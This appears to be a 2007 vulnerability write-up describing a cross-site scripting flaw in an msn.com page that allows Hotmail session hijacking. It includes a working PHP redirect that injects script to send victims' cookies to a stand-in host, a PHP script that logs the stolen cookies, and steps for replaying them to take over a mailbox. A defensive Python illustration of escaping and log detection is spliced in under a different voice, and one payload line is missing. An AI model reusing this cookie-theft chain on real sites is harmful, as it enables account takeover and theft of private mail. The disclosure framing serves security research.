A flaw of minimal scope would let me access any Hotmail or MSN mailbox simply by enticing the person to click a malicious link.
Thanks to the head of the Microsoft lab labo-microsoft.org, Mr Loïc Thobois, who helped me pass this information on to the people in charge at Microsoft.
The server concerned has been taken offline, and corrective work is already under way.
That said, I will explain how I found this flaw and how I was able to exploit it, without giving you the exact URL as a security precaution.
For professional reasons, this exploit was written in English. If you wish, I will write it in French and Spanish ;p
----------------------------------------------------------------------------------------------------------------------
/* MSN & HOTMAIL Cross Site Scripting Xploit
author : TLEMCANI Hamza
contact: hamza_at_supinfo_com
original url: http://tlemcani.typepad.fr/tlemcani_hamza/2007/02/pirater_la_boit.html
severity and vendor: Medium/High MSN.COM
Tested on: all Firefox and IE versions
Description :
First of all, I would like to say that this is a simple XSS vulnerability that lets me, in some ways, take total control of any Hotmail/MSN mail account for 24 hours. This kind of vulnerability has been known for years, but they are still present on some parts of msn.com, and that's why I am posting this message. Some of them need special syntax to be exploitable, and that is the case for the one I am going to present.
Oh, I forgot: if you don't know what an XSS vulnerability is and don't know how to exploit it, then just stop reading. I am not going to give you the exact URL until I have the rights from Microsoft.
Disclaimer:
This entire document is for educational, testing and demonstration purposes only. Modification, use and/or publishing
of this information is entirely at your OWN risk. The information provided in this advisory is to be used/tested on your
OWN machine/account. I cannot be held responsible for any of the above.
Exploitation :
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.
In this case, I found a URL which looks like:
http://xxx.xxx.msn.com/xxx/xxx/xxx/mmt.asp?[...]&msn_link=
I tried different syntaxes, but they didn't work. I was trying to introduce some JavaScript requests into the page, to see if the website would execute malicious code. But no luck.
A few minutes later, by analysing the source code, and after a lot of tests, I found that we had to add %22%E3 to the URL so the page would execute our requests without any problem.
The first thing I tried was:
and it worked! I got an error message with all my cookies.
During normal operation, cookies are sent back and forth between MSN servers and the browsing user's computer. Since cookies may contain sensitive information, their values should not be accessible to other computers. Cookie theft is any process allowing an unauthorised party to obtain a cookie. And this is what I tried.
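As an added illustration (not the author's code and not MSN's), the Python below models the bug class described above: a query parameter reflected unescaped into an HTML attribute, which the %22%3E prefix used in the redirection URL further down decodes to `">` and breaks out of, beside the HTML-encoded form that closes the hole, plus a check that flags such requests in constructed web-server log lines. The template, payload, log lines and function names are all assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed stand-in for a page that pastes a query parameter into an href
# attribute, the pattern the advisory describes for msn_link= (not MSN's code).
TEMPLATE = '<a href="{value}">continue</a>'

def render_unescaped(param: str) -> str:
    """Vulnerable: the decoded parameter goes straight into the attribute."""
    return TEMPLATE.format(value=unquote(param))

def render_escaped(param: str) -> str:
    """Hardened: HTML-encode the value, quotes included, before insertion."""
    return TEMPLATE.format(value=html.escape(unquote(param), quote=True))

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def breaks_out(rendered: str) -> bool:
    """True when a real <script> tag ends up in the markup, i.e. the value escaped the attribute."""
    return SCRIPT_TAG.search(rendered) is not None

# Constructed payload shaped like the advisory's: %22%3E closes the attribute and the tag.
PAYLOAD = "%22%3E%3Cscript%3Ealert(1)%3C/script%3E"

# Detection side: decode the request line, then look for quote + '>' + '<script'.
BREAKOUT = re.compile(r'"\s*>\s*<script', re.IGNORECASE)

def suspicious_requests(log_lines):
    """Return the log lines whose query string carries an attribute-breakout payload."""
    return [line for line in log_lines if BREAKOUT.search(unquote(line))]

# Constructed web-server log lines (not from any real server).
LOG_LINES = [
    "GET /x/mmt.asp?id=1&msn_link=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 200",
    "GET /x/mmt.asp?id=1&msn_link=http://example.invalid/ 200",
]

if __name__ == "__main__":
    print(render_unescaped(PAYLOAD))   # attribute closed, script tag injected
    print(render_escaped(PAYLOAD))     # payload rendered as inert text
    print(suspicious_requests(LOG_LINES))
```

Escaping on output is the fix for the reflection itself; marking the session cookie HttpOnly additionally keeps document.cookie from exposing it to injected script.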
So first of all, I created two files on one of my websites.
The first was named redirection.php.
This is the source code of this page:
<?php
header("Location: http://xxx.xxx.msn.com/xxx/xxx/xxx/mmt.asp?[...]&msn_link=%22%3E%3Cscript%3Edocument.location.href= 'http://www.yourwebsite.com/hack-msn.php?cookie='%2Bescape(document.cookie);%3C/script%3E");
exit;
?>
For those who have already understood the redirection,
I also created a file called hack-msn.php. The first file redirects the user to the XSS vulnerability, which is programmed to steal your cookies and send them to my website, thanks to the second file.
Here is the source code of hack-msn.php:
<?php
$filename = "cookies.txt";
if (isset($_GET["cookie"]))
{
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Erreur: Impossible d écrire sur le fichier cookies";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Erreur lors de l ectriture sur le fichier cookies";
            exit;
        }
    }
    echo "<script>window.location='http://www.labo-microsoft.org'</script>";
    fclose($handle);
    exit;
}
echo "rien à écrire dans le fichier cookies";
exit;
?>
Alright, when the person gets redirected to the XSS vulnerability, their cookies are automatically stolen and saved in a file named cookies.txt.
Then I just have to replace my cookies with my victim's cookies and type this URL:
http://by21fd.bay21.hotmail.msn.com/cgi-bin/hmhome?fti=yes
Greetz to ZATAZ.COM and _6m0_HaCk from morx, who also found some XSS vulnerabilities on msn/hotmail.
----------------------------------------------------------------------------------------------------------------------
TLEMCANI Hamza.